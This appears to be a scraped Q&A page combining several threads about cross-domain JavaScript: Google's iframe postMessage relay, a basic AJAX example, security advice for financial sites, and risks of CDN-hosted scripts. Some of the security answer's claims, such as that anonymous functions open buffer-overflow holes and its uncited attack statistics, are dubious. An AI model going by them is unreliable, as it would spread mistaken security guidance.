[Google-api] How does Google's javascript API get around the cross-domain security in AJAX


Answers

The accepted answer is wrong. Ben is correct. Below is the actually iframe node pulled off a page using the Google API JavaScript Client.

<iframe name="oauth2relay678" id="oauth2relay678" 
        src="https://accounts.google.com/o/oauth2/postmessageRelay?
             parent=https%3A%2F%2Fwww.example.com.au#rpctoken=12345&amp;forcesecure=1" 
             style="width: 1px; height: 1px; position: absolute; left: -100px;">
</iframe>

Basic summary of how this works is here: http://ternarylabs.com/2011/03/27/secure-cross-domain-iframe-communication/. On modern browsers they utilize HTML postMessage to achieve communication, and on older browsers, they use a neat multiple-iframe-urlhash-read+write-combination hack. Ternary Labs have made a library which abstracts all the hacky stuff out, essentially giving you postMessage on all browsers.

One day I'll build ontop of this library to simplify cross-domain REST APIs...

Edit: That day has come and XDomain is here - https://github.com/jpillora/xdomain

Question

How does Google's API make cross-domain requests back to Google, when it's on your website?




want to create a js plugin that sends a lot of data async to another server

you can use Ajax to send a lot of data.

Native Javascript:

function NewAjax(){
var xmlhttp=false;
try{
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){
    try{
        xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    }catch(E){
        xmlhttp = false;
    }
}

if(!xmlhttp && typeof XMLHttpRequest!='undefined'){
    xmlhttp = new XMLHttpRequest();
}
return xmlhttp;
} 
function load_page (url, container){
ajax=NewAjax(); 
ajax.open("GET", url,true); 
ajax.onreadystatechange=function(){
    if(ajax.readyState==1){
        container.innerHTML = "loading";//<-- Preload
    }else if(ajax.readyState==4){
        //Page loaded
        if(ajax.status==200){
            //OK
            container.innerHTML = ajax.responseText;
            add_action();

        }else if(ajax.status==404){
            //Page doesn't exist
            container.innerHTML = "Erro loading page";
        }else{
            //Show error 
            container.innerHTML = "Error:".ajax.status; 
        }
    }
}
ajax.send(null); }

Or

JQuery Ajax:

$.ajax({url: 'ajax/test.html',
success: function(data) {
$('.result').html(data);
alert('Load was performed.');}});



Once the user logs in I would try avoid any sort of client scripting except where ABSOLUTELY necessary. Here are the recommendations I would recommend for web work regarding online financial services:

1) Send ALL assets to the user via HTTPS from the same domain. Although it is slower and most costly for the bandwidth it is also more secure because you control all the assets from manipulation directly. By all assets I really mean all assets even including images since manipulation of images containing text content could be used to send false instructions in advance of a phishing attempt. In this regard I would not use a CDN to store your assets, because that is not a location that you own so you have less control to monitor the stored data for tampering.

2) Do NOT use AJAX or anything else with XMLHttpRequest object. The point of asynchronous communication is to beacon information between points outside of reloading a page. That is great for usability, but completely defeats security. Since it executes on the client side compromised code can also be used to defeat legitimate SSL encryption by beaconing information from the user to an untrusted third party after the information is decrypted at the user's end. When dealing with purchases, PII, or financial data ALWAYS ensure each information transaction from the user forces a page reload or a new page.

3) Avoid using any sort of client side scripting. The means do not use ActiveX, Flash, or even Acrobat at all. 95% of all reported security vulnerabilities are attributed to client side scripting and 70% of those attacks target memory corruption of the processing software. Although JavaScript is not normally known for buffer overflows I would still recommend using it as little as possible to manipulate the DOM only.

4) Never pass an anonymous function as an argument in a function or method in JavaScript. This is not something that commonly occurs, but in the case of certain built in methods this can allow a hole through the JavaScript interpreter to the processing software, which could then be an attack vector to insert code necessary to cause a buffer overflow.

5) Do not use the onsubmit event to attach script execution to the submission of form data. Violating the executing code, or appending extra malicious code, can create a point in which to include the XMLHttpRequest function to anonymously beacon the form data to an untrusted third party in advance of sending it to the trusted source even if the transfer protocol of the action attribute is HTTPS.

6) So long as you stick to VALID XHTML, CSS, and text for nearly all possible aspects of the user experience and communicate using only HTTPS you should be mostly fine.

You have to keep in mind that banks and educational institutions receive 40% of all known attacks, so you MUST assume your work will be attacked and compromised. The average cost of a single attack in 2008 was $11.3 million. If the bank could attack you for those damages, because you did not consider the full depth of security, how would you respond? Plan accordingly to ensure your work is as locked down as possible.




What security considerations / concerns should be addressed when using CDN hosted code?

If you're only using them as JavaScript includes, and as JavaScript is only client side, it potentially has access to anything and everything that gets rendered as XHTML through the DOM. This would be based on if the CDN got hacked and the JavaScript you were including got altered maliciously. See How does Google's javascript API get around the cross-domain security in AJAX for info on JavaScript being used cross-domain.

As others have said, it simply isn't worth the risk considering the almost zero advantages. JavaScript libraries are generally too small to matter about saving server space/bandwidth/access speeds/etc...